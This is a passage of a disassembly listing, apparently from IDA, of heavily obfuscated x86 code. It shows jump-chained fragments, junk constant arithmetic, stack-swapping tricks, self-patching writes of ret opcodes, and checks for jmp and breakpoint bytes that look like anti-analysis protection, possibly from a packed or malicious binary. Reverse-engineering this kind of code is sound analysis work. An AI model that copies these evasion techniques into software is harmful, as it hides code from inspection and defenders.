; FUNCTION CHUNK AT 004470A1 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044C917 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044D29C SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00450C99 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 00452CC2 SIZE 0000001F BYTES

		push	ebp
		mov	ebp, eax
		xchg	ebp, [esp+4+var_4]
		push	ecx
		pop	eax
		or	ecx, eax
		jmp	loc_450C99
sub_43B765	endp

; ---------------------------------------------------------------------------
		popf
		cmp	eax, 1695A901h
		jmp	loc_43F457
; ---------------------------------------------------------------------------

loc_43B780:				; CODE XREF: y2kk37jd:loc_43DEA6j
		mov	byte ptr [eax],	0C3h
		jmp	loc_45A1E8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453849

loc_43B788:				; CODE XREF: sub_453849:loc_45939Dj
		xchg	eax, [esp+4+var_4]
		mov	edx, eax
		pop	eax
		mov	eax, [esp+0]
		push	offset loc_43BBAF
		jmp	nullsub_274
; END OF FUNCTION CHUNK	FOR sub_453849
; ---------------------------------------------------------------------------

loc_43B79B:				; CODE XREF: y2kk37jd:loc_45B1B7j
		imul	byte ptr [edx]
		cmp	al, 0A4h
		jz	loc_44DE34
		jmp	loc_45B2D1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445568

loc_43B7AA:				; CODE XREF: sub_445568+4A4Bj
		jnb	loc_450438

loc_43B7B0:				; CODE XREF: y2kk37jd:loc_45AB06j
		push	esi
		push	8E64B7CEh
		xchg	ebp, [esp+8+var_8]
		xor	esi, ebp
		jmp	loc_44DA4A
; END OF FUNCTION CHUNK	FOR sub_445568
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44036F

loc_43B7C0:				; CODE XREF: sub_44036F+87AEj
		or	edi, 0DDF19469h

loc_43B7C6:				; CODE XREF: sub_45B7AA:loc_448ECEj
		and	edi, 0E9C180DCh
		add	edi, 168245B8h
		xchg	edi, [esp+0]
		jmp	sub_442C3E
; END OF FUNCTION CHUNK	FOR sub_44036F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443525

loc_43B7DA:				; CODE XREF: sub_443525:loc_44EBA3j
		push	ecx
		push	ecx
		push	7B57056Eh
		pop	ecx
		sub	ecx, 5B418037h
		test	ecx, 4

loc_43B7EE:				; CODE XREF: sub_45B7AA-1C3B2j
		jmp	loc_4552AF
; END OF FUNCTION CHUNK	FOR sub_443525

; =============== S U B	R O U T	I N E =======================================



sub_43B7F3	proc near		; CODE XREF: y2kk37jd:00450AE5j
					; sub_45B135+5p

; FUNCTION CHUNK AT 0044CA8A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00453D72 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0045A571 SIZE 00000005 BYTES

		xchg	eax, [esp+0]
		pop	eax
		call	sub_45ADEC
		mov	eax, 649E33C4h
		call	sub_440337
		jmp	loc_44CA8A
sub_43B7F3	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B7AA

loc_43B80B:				; CODE XREF: sub_45B7AA+5Dj
		xor	eax, 669913B0h
		sub	ecx, 0A0BCBE45h
		jmp	loc_44CD8A
; END OF FUNCTION CHUNK	FOR sub_45B7AA
; ---------------------------------------------------------------------------

loc_43B81C:				; CODE XREF: y2kk37jd:0043E755j
		mov	byte ptr [eax],	0C3h
; START	OF FUNCTION CHUNK FOR sub_44F3F5

loc_43B81F:				; CODE XREF: sub_44F3F5-D7F5j
		jmp	loc_452D5F
; END OF FUNCTION CHUNK	FOR sub_44F3F5
; ---------------------------------------------------------------------------
		xchg	ebx, [esp]
		mov	edx, ebx
		pop	ebx
		mov	eax, [esp]
		push	edx
		call	sub_454D0F
		mov	eax, 3FFC3041h
		jmp	loc_44A9C1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443AA7

loc_43B83D:				; CODE XREF: sub_443AA7+472Bj
		shr	eax, 0Fh
		xchg	esi, [ecx]
		ror	edx, 0Fh
		cmp	esi, 1C2668D0h
		jmp	loc_440F77
; END OF FUNCTION CHUNK	FOR sub_443AA7

; =============== S U B	R O U T	I N E =======================================



sub_43B850	proc near		; DATA XREF: sub_43ECB4+6o
		mov	[ecx], eax
		pop	ecx
		lea	eax, nullsub_202
		mov	byte ptr [eax],	0C3h
		jmp	loc_45B35A
sub_43B850	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_43B861:				; CODE XREF: y2kk37jd:0043FD81j
					; y2kk37jd:00449F35j
		call	sub_43E0DE
; START	OF FUNCTION CHUNK FOR sub_44CC02

loc_43B866:				; CODE XREF: sub_44CC02+Dj
		jmp	loc_44CF22
; END OF FUNCTION CHUNK	FOR sub_44CC02
; ---------------------------------------------------------------------------
		test	esi, ebx
		jmp	loc_4436BB
; ---------------------------------------------------------------------------

loc_43B872:				; DATA XREF: sub_445787:loc_455063o
		mov	eax, 0B1h
		push	ecx
		push	offset sub_44DB40
		jmp	locret_44902B

; =============== S U B	R O U T	I N E =======================================



sub_43B882	proc near		; CODE XREF: sub_44B0A6+1Ap
					; y2kk37jd:00456DDBj
		xchg	edi, [esp+0]
		pop	edi
		xor	eax, eax
		retn
sub_43B882	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458A74

loc_43B889:				; CODE XREF: sub_458A74-C1FCj
		jmp	loc_448DA1
; END OF FUNCTION CHUNK	FOR sub_458A74
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45913D

loc_43B88E:				; CODE XREF: sub_45913D:loc_44BD00j
					; sub_45913D-AB6Dj
					; DATA XREF: ...
		call	sub_4592B8
; END OF FUNCTION CHUNK	FOR sub_45913D
; START	OF FUNCTION CHUNK FOR sub_451964

loc_43B893:				; CODE XREF: sub_451964+19j
		jmp	loc_446FDE
; END OF FUNCTION CHUNK	FOR sub_451964
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_453. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4443CD

loc_43B899:				; CODE XREF: sub_4443CD+16CA9j
		jmp	loc_441CCE
; END OF FUNCTION CHUNK	FOR sub_4443CD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FE51

loc_43B89E:				; CODE XREF: sub_43FE51:loc_45486Fj
		add	eax, 62F426AAh
		popf
		mov	[ebp-28h], eax

loc_43B8A8:				; CODE XREF: sub_43BF5F+CE8j
		mov	eax, [ebp-24h]
		cmp	byte ptr [eax],	0
; END OF FUNCTION CHUNK	FOR sub_43FE51
; START	OF FUNCTION CHUNK FOR sub_44AC89

loc_43B8AE:				; CODE XREF: sub_44AC89:loc_44689Cj
		jnz	loc_442AAA
		jmp	loc_4492EB
; END OF FUNCTION CHUNK	FOR sub_44AC89
; ---------------------------------------------------------------------------
		mov	eax, 0C7CC2482h
		push	esi
		push	2B15705Ah
		pop	esi
		or	esi, 0E703C025h

loc_43B8CB:				; CODE XREF: y2kk37jd:loc_440363j
		cmp	esi, 0D614FD4h
; START	OF FUNCTION CHUNK FOR sub_4411C3

loc_43B8D1:				; CODE XREF: sub_4411C3:loc_451DE8j
		jmp	loc_440C04
; END OF FUNCTION CHUNK	FOR sub_4411C3

; =============== S U B	R O U T	I N E =======================================



sub_43B8D6	proc near		; CODE XREF: sub_448DCA+6p
					; y2kk37jd:00451B30j

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

; FUNCTION CHUNK AT 0043B59F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043DFF7 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0043FC0A SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00441044 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004425CE SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0044725F SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00447668 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004491C3 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0044E173 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044EC62 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0044F081 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00454E10 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0045554C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455FA0 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00457628 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00457D55 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045B750 SIZE 00000021 BYTES

		xchg	edx, [esp+0]
		pop	edx
		pop	edx
		mov	eax, [esp-8+arg_4]
		push	edx
		call	sub_456FFB

loc_43B8E4:				; CODE XREF: sub_4438B1+13D03j
		jmp	loc_447668
sub_43B8D6	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		push	0D84DD0C2h
		jmp	sub_43DF8A
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_209. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4425EC

loc_43B8F4:				; CODE XREF: sub_4425EC+Fj
		jmp	loc_44C70E
; END OF FUNCTION CHUNK	FOR sub_4425EC
; ---------------------------------------------------------------------------

loc_43B8F9:				; CODE XREF: y2kk37jd:0044B7D6j
		xchg	eax, edx
		and	ebp, ecx

loc_43B8FD:				; CODE XREF: y2kk37jd:0044E54Aj
		and	ecx, 57E10DB6h
		add	ecx, 0FE83A238h
		xchg	ecx, [esp]
		jmp	sub_440CD1
; ---------------------------------------------------------------------------
		jnz	loc_44B45C
		popf
		jmp	sub_45977D
; ---------------------------------------------------------------------------
		xchg	eax, ecx
		jmp	sub_4554E9
; ---------------------------------------------------------------------------

loc_43B924:				; CODE XREF: y2kk37jd:loc_445221j
		pop	ebx
		rol	ebx, 2
		xor	ebx, 0A52DA7DBh
		add	ebx, ecx
		add	ebx, 22569D13h
		mov	[ebx], eax
		jmp	loc_448369
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_512. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F086

loc_43B93E:				; CODE XREF: sub_44F086:loc_45326Dj
		jmp	loc_451160
; END OF FUNCTION CHUNK	FOR sub_44F086
; ---------------------------------------------------------------------------
		db 0Fh
		dd 198E8Ah
		db 0

; =============== S U B	R O U T	I N E =======================================



sub_43B949	proc near		; CODE XREF: sub_43C851+C2ABp
		xchg	esi, [esp+0]
		pop	esi
		call	sub_4581BB
		push	offset sub_44D627
		jmp	nullsub_25
sub_43B949	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45689F

loc_43B95C:				; CODE XREF: sub_45689F-1456Bj
		jnz	loc_45C277
		jmp	loc_457582
; END OF FUNCTION CHUNK	FOR sub_45689F
; ---------------------------------------------------------------------------
		cmp	eax, 0E3002626h
		jmp	loc_4480C5
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_463. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_43B973:				; CODE XREF: y2kk37jd:0045A550j
		jmp	loc_45B211
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451634

loc_43B978:				; CODE XREF: y2kk37jd:004461D1j
					; sub_451634+12j
		xchg	eax, [esp+0]
		mov	edx, eax
		push	edi
		push	3C72733Bh
		pop	edi
		rol	edi, 11h
		jmp	loc_45458E
; END OF FUNCTION CHUNK	FOR sub_451634
; ---------------------------------------------------------------------------

loc_43B98C:				; DATA XREF: sub_445083:loc_43C3AFo
		push	0
		push	10h
		call	sub_45922C
; START	OF FUNCTION CHUNK FOR sub_44A57D

loc_43B995:				; CODE XREF: sub_44A57D+11j
		jmp	loc_45BFFD
; END OF FUNCTION CHUNK	FOR sub_44A57D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BA66

loc_43B99A:				; CODE XREF: sub_43BA66+8B04j
		jmp	loc_459211
; END OF FUNCTION CHUNK	FOR sub_43BA66
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_315. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4429DD

loc_43B9A0:				; CODE XREF: sub_4429DD+D0DDj
		mov	[ebp-5], al

loc_43B9A3:				; CODE XREF: y2kk37jd:0043DBD2j
					; sub_445226:loc_43E525j ...
		jnz	loc_43D32B
		cmp	byte ptr [ebp-5], 0
		jnz	loc_448B33
		jmp	loc_446826
; END OF FUNCTION CHUNK	FOR sub_4429DD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B7AA

loc_43B9B8:				; CODE XREF: sub_45B7AA-128B8j
		jnz	loc_4512A8
		jmp	loc_4465B7
; END OF FUNCTION CHUNK	FOR sub_45B7AA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4599BE

loc_43B9C3:				; CODE XREF: sub_4599BE-C21Bj
		jz	loc_4455D8
		jmp	loc_43F9D3
; END OF FUNCTION CHUNK	FOR sub_4599BE
; ---------------------------------------------------------------------------

locret_43B9CE:				; CODE XREF: y2kk37jd:loc_44E5E0j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C46D

loc_43B9CF:				; CODE XREF: sub_43C46D+9AB9j
		jmp	loc_43BE3B
; END OF FUNCTION CHUNK	FOR sub_43C46D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440753

loc_43B9D4:				; CODE XREF: sub_440753+1Bj
		jmp	nullsub_32
; END OF FUNCTION CHUNK	FOR sub_440753
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C46D

loc_43B9D9:				; CODE XREF: sub_43C46D+20B3j
		jmp	loc_4589EA
; END OF FUNCTION CHUNK	FOR sub_43C46D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D8B6

loc_43B9DE:				; CODE XREF: sub_43D8B6-10C2j
		jmp	loc_43B378
; END OF FUNCTION CHUNK	FOR sub_43D8B6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_43B9E3:				; CODE XREF: sub_445226+16F54j
		jnz	loc_4456B6
		jmp	loc_457E67
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45BC07

loc_43B9EE:				; CODE XREF: sub_45BC07+10j
		jnb	loc_45439B
		xor	esi, 55A8CC7Ah
; END OF FUNCTION CHUNK	FOR sub_45BC07

; =============== S U B	R O U T	I N E =======================================



sub_43B9FA	proc near		; CODE XREF: sub_44A6E9+9p

; FUNCTION CHUNK AT 00444FC4 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00448E5E SIZE 00000005 BYTES

		xchg	eax, [esp+0]
		pop	eax
		jmp	loc_444FC4
sub_43B9FA	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_43BA03:				; CODE XREF: sub_445226+601Ej
		xchg	edi, [edx]
		adc	ebx, 0A5150516h
		pushf

loc_43BA0C:				; CODE XREF: sub_445226:loc_444DADj
		call	sub_448797

loc_43BA11:				; CODE XREF: y2kk37jd:004481B2j
		jmp	loc_45B0D1
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C304

loc_43BA16:				; CODE XREF: sub_44C304+9j
		mov	esp, ebp
		xchg	ecx, [esp+4+var_4]
		mov	ebp, ecx
		pop	ecx
		push	0E2D1F819h
		jmp	loc_4516EC
; END OF FUNCTION CHUNK	FOR sub_44C304

; =============== S U B	R O U T	I N E =======================================



sub_43BA28	proc near		; DATA XREF: sub_445226+4411o

; FUNCTION CHUNK AT 00451C78 SIZE 00000005 BYTES

		mov	[edx], eax
		pop	edx
		lea	eax, sub_445787
		mov	byte ptr [eax],	0C3h
		jmp	loc_451C78
sub_43BA28	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43ED86

loc_43BA39:				; CODE XREF: sub_43ED86+3CEDj
		jz	loc_447A69
		jmp	loc_4561E5
; END OF FUNCTION CHUNK	FOR sub_43ED86
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441856

loc_43BA44:				; CODE XREF: sub_441856:loc_446892j
		jnz	loc_4517A5
		jmp	loc_43C3D0
; END OF FUNCTION CHUNK	FOR sub_441856
; ---------------------------------------------------------------------------

loc_43BA4F:				; CODE XREF: y2kk37jd:00442E35j
		or	esi, 0EAE42A03h
		test	esi, 2
		jmp	loc_4478C0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_285. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4564EB

loc_43BA61:				; CODE XREF: sub_4564EB-BFD8j
		jmp	loc_45B03E
; END OF FUNCTION CHUNK	FOR sub_4564EB

; =============== S U B	R O U T	I N E =======================================



sub_43BA66	proc near		; CODE XREF: sub_44001E:loc_43E33Dp
					; sub_447407:loc_440EA2p ...

; FUNCTION CHUNK AT 0043B68B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043B99A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043D7CE SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0043E64D SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043F483 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00441E83 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044455C SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00451A07 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004585DE SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00459211 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00459372 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0045A0D5 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0045BE2A SIZE 00000012 BYTES

		jb	sub_45921B
		push	ebp
		mov	ebp, esp
		push	ecx
		cmp	ds:dword_4470B8, 0
		jz	loc_43D7CE
		jmp	loc_44455C
sub_43BA66	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44EC21

loc_43BA82:				; CODE XREF: sub_44EC21-13534j
					; sub_44EC21:loc_446469j
		call	sub_43CBDE
; END OF FUNCTION CHUNK	FOR sub_44EC21
; START	OF FUNCTION CHUNK FOR sub_442829

loc_43BA87:				; CODE XREF: sub_442829:loc_450BD1j
		jz	loc_4407D1
		jmp	loc_43EBA6
; END OF FUNCTION CHUNK	FOR sub_442829
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4534CC

loc_43BA92:				; CODE XREF: sub_4534CC+13j
		mov	byte ptr [eax],	0C3h
		jmp	loc_45A424
; END OF FUNCTION CHUNK	FOR sub_4534CC
; ---------------------------------------------------------------------------
		call	nullsub_462
		jmp	ds:dword_41E1B8
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_462. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
		cmp	byte ptr [ecx+5A000166h], 8Bh
		add	al, 24h
		push	edx

loc_43BAB0:				; CODE XREF: y2kk37jd:loc_459E82j
		jmp	loc_45110D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448DCA

loc_43BAB5:				; CODE XREF: sub_448DCA:loc_458B3Aj
		sbb	eax, 0F70C6C00h
		mov	edx, [ebx]
		jmp	loc_44D89B
; END OF FUNCTION CHUNK	FOR sub_448DCA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B0D0

loc_43BAC2:				; CODE XREF: sub_44B0D0+76AFj
		xor	ecx, 25DB57CEh

loc_43BAC8:				; CODE XREF: sub_44B0D0:loc_4433F3j
		mov	eax, [ebp-4]
		cmp	byte ptr [eax],	0F1h
		jnz	loc_44F2F1
		jmp	loc_447384
; END OF FUNCTION CHUNK	FOR sub_44B0D0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_469. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CDD5

loc_43BADA:				; CODE XREF: sub_44CDD5+2DBCj
		jmp	loc_44B895
; END OF FUNCTION CHUNK	FOR sub_44CDD5
; ---------------------------------------------------------------------------

loc_43BADF:				; CODE XREF: y2kk37jd:004594D2j
		mov	[edx], eax
		pop	edx
		lea	eax, nullsub_236
		push	offset sub_43B609
		jmp	loc_45AE2F

; =============== S U B	R O U T	I N E =======================================



sub_43BAF2	proc near		; CODE XREF: y2kk37jd:0043EEA6p
					; y2kk37jd:0043F58Bj

; FUNCTION CHUNK AT 0043B373 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00448CE0 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00449466 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00450E07 SIZE 00000024 BYTES
; FUNCTION CHUNK AT 0045A075 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045A872 SIZE 00000005 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		mov	eax, 1
		shl	eax, cl
		jmp	loc_43B373
sub_43BAF2	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B1D6

loc_43BB02:				; CODE XREF: sub_43B1D6+154Ej
					; sub_44A326:loc_458B74j
		push	edx
		push	3184D41Ch
		pop	edx
		or	edx, 89B0A219h
		and	edx, 0B9D85723h
		rol	edx, 9
		add	edx, 0DF97BCA4h
		call	sub_45977D

loc_43BB23:				; CODE XREF: y2kk37jd:004441D7j
		jmp	nullsub_257
; END OF FUNCTION CHUNK	FOR sub_43B1D6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45689F

loc_43BB28:				; CODE XREF: sub_45689F:loc_43DB52j
		add	ebx, ds:4000F2h
		jnz	loc_45BCA2

loc_43BB34:				; CODE XREF: sub_445568+D87Cj
		jmp	loc_45AE49
; END OF FUNCTION CHUNK	FOR sub_45689F
; ---------------------------------------------------------------------------

loc_43BB39:				; CODE XREF: y2kk37jd:00441440j
		jmp	loc_43E530
; ---------------------------------------------------------------------------
		adc	esi, 4EECCDCBh
; START	OF FUNCTION CHUNK FOR sub_4411C3

loc_43BB44:				; CODE XREF: sub_4411C3:loc_45951Cj
		cmp	ecx, 4308B5Ch
		jmp	loc_451675
; END OF FUNCTION CHUNK	FOR sub_4411C3
; ---------------------------------------------------------------------------
		pop	ebx
		jmp	loc_43B27E

; =============== S U B	R O U T	I N E =======================================



sub_43BB55	proc near		; CODE XREF: sub_44B79D:loc_449033j
					; sub_44B79D+FF52j

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 00447C14 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00451A63 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00452C4A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00459F41 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045B0C1 SIZE 00000010 BYTES

		push	ebx
		mov	ebx, edi
		xchg	ebx, [esp+4+var_4]
		push	73ACF5EAh
		pop	edi

loc_43BB61:				; CODE XREF: sub_44DED9-80FFj
		rol	edi, 1Fh
		cmp	edi, 18F3E41Bh
		jmp	loc_452C4A
sub_43BB55	endp


; =============== S U B	R O U T	I N E =======================================



sub_43BB6F	proc near		; CODE XREF: sub_44EF0D:loc_44D97Ep
					; y2kk37jd:0044ED4Fj

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0045A844 SIZE 0000000E BYTES

		xchg	eax, [esp+0]
		pop	eax
		push	1B72F517h
		pop	edi
		xor	edi, 7F160826h
		sub	edi, 42F3A2D2h
		or	edi, 0D2215A33h
		jmp	loc_45A844
sub_43BB6F	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		push	10CB9E81h
		pop	eax
		and	eax, 510E14C4h
		sub	eax, 589C0F91h
		js	loc_44EE9D
		adc	ecx, eax
		jmp	loc_44EE8A
; ---------------------------------------------------------------------------

loc_43BBAF:				; DATA XREF: sub_453849-180B8o
		push	edx
		mov	edx, eax
		xchg	edx, [esp]
		push	edx
		pop	eax
		xchg	eax, [esp]
		call	sub_44D588

loc_43BBBF:				; CODE XREF: y2kk37jd:00456F80j
		jmp	loc_459B6F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451A35

loc_43BBC4:				; CODE XREF: sub_451A35-13878j
		jz	sub_455C55
		jmp	loc_455BE4
; END OF FUNCTION CHUNK	FOR sub_451A35
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444899

loc_43BBCF:				; CODE XREF: sub_444899:loc_45BB50j
		or	ecx, 7034BD81h
		sub	ecx, 0A451EBC1h
		rol	ecx, 10h
		xor	ecx, 0B40A205Fh
		add	ecx, 985F60DCh
		jmp	loc_450430
; END OF FUNCTION CHUNK	FOR sub_444899
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444DF4

loc_43BBEF:				; CODE XREF: sub_444DF4:loc_459E9Bj
		mov	eax, [ebp+var_4]
		cmp	byte ptr [eax],	0E9h
		jz	loc_452656
		jmp	loc_444026
; ---------------------------------------------------------------------------

loc_43BC00:				; CODE XREF: sub_444DF4:loc_444DFDj
		mov	eax, [ebp+var_4]
		jmp	loc_45C66F
; END OF FUNCTION CHUNK	FOR sub_444DF4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453FBA

loc_43BC08:				; CODE XREF: sub_453FBA-2141j
		pop	ebp
		rol	ebx, 0Fh
		or	ebx, 0ECE78BB9h
		add	ebx, 0CA9BA9B0h
		call	sub_442C0A
; END OF FUNCTION CHUNK	FOR sub_453FBA
; START	OF FUNCTION CHUNK FOR sub_44753E

loc_43BC1D:				; CODE XREF: sub_44753E+29E8j
		adc	ebx, esi
		cdq

loc_43BC20:				; CODE XREF: sub_44753E:loc_45BD54j
		push	offset sub_454925
		jmp	nullsub_406
; END OF FUNCTION CHUNK	FOR sub_44753E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F8B8

loc_43BC2A:				; CODE XREF: sub_43F8B8-2896j
		jge	loc_43DF5B
		add	ebp, 88838631h

loc_43BC36:				; CODE XREF: sub_43F8B8:loc_43FE88j
		rol	ecx, 0Ah
		sub	ecx, 908B1352h
		xor	ecx, 8A862842h
		call	sub_457239

loc_43BC4A:				; CODE XREF: sub_45B7AA-1111Bj
		jmp	nullsub_374
; END OF FUNCTION CHUNK	FOR sub_43F8B8
; ---------------------------------------------------------------------------

loc_43BC4F:				; CODE XREF: y2kk37jd:00442DBAj
		jmp	sub_451711
; ---------------------------------------------------------------------------

loc_43BC54:				; CODE XREF: y2kk37jd:00450809j
		jle	loc_454D4C
		mov	ebp, [edx]
		jmp	sub_43CBDE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457F67

loc_43BC61:				; CODE XREF: sub_457F67:loc_457F76j
		call	sub_44D51F
		mov	edx, [ebp-8]

loc_43BC69:				; CODE XREF: y2kk37jd:0045AC6Aj
		mov	eax, [ebp-4]
		call	nullsub_238
		pop	ecx
		pop	ecx
		pop	ebp
		jmp	loc_457E4B
; END OF FUNCTION CHUNK	FOR sub_457F67
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C851

loc_43BC79:				; CODE XREF: sub_43C851+10555j
		pushf
		jo	loc_443CA0
		add	eax, ebp
; END OF FUNCTION CHUNK	FOR sub_43C851

; =============== S U B	R O U T	I N E =======================================



sub_43BC82	proc near		; CODE XREF: sub_43C851:loc_44C42Aj

; FUNCTION CHUNK AT 0044E8DD SIZE 00000005 BYTES

		push	ebx
		push	offset loc_45A498

loc_43BC88:				; CODE XREF: y2kk37jd:0044E0C2j
		jmp	loc_44E8DD
sub_43BC82	endp

; ---------------------------------------------------------------------------

loc_43BC8D:				; CODE XREF: y2kk37jd:0045BFCDj
		xchg	edi, [ebp+0]
; START	OF FUNCTION CHUNK FOR sub_454D0F

loc_43BC90:				; CODE XREF: sub_454D0F:loc_45BFBFj
		and	ecx, 0B980244Eh
		add	ecx, 0E744207Ah
		mov	[ecx], eax
		pop	ecx

loc_43BC9F:				; CODE XREF: sub_4554A3-17062j
					; sub_440040:loc_451AEEj
		add	eax, 336D3A3Dh
		ror	eax, 7
		add	eax, 0D5A7585Ch
		jmp	loc_4442D0
; END OF FUNCTION CHUNK	FOR sub_454D0F
; ---------------------------------------------------------------------------

loc_43BCB3:				; CODE XREF: y2kk37jd:loc_44868Ej
		push	offset sub_4447FB
		jmp	loc_45949E
; ---------------------------------------------------------------------------
		pop	edx
		and	edx, 0D9C75F73h
		test	edx, 80000h
		jmp	loc_43DE55
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45593D

loc_43BCCF:				; CODE XREF: sub_45593D:loc_454B93j
		mov	[ebp+var_1], al
		cmp	[ebp+var_1], 0
		jz	loc_452E58
		mov	[ebp+var_8], 1

loc_43BCE3:				; CODE XREF: sub_45593D-2AE0j
					; y2kk37jd:00455938j
		mov	eax, [ebp+var_8]
		pop	ecx
		pop	ecx
		pop	ebp
		jmp	loc_45A1E3
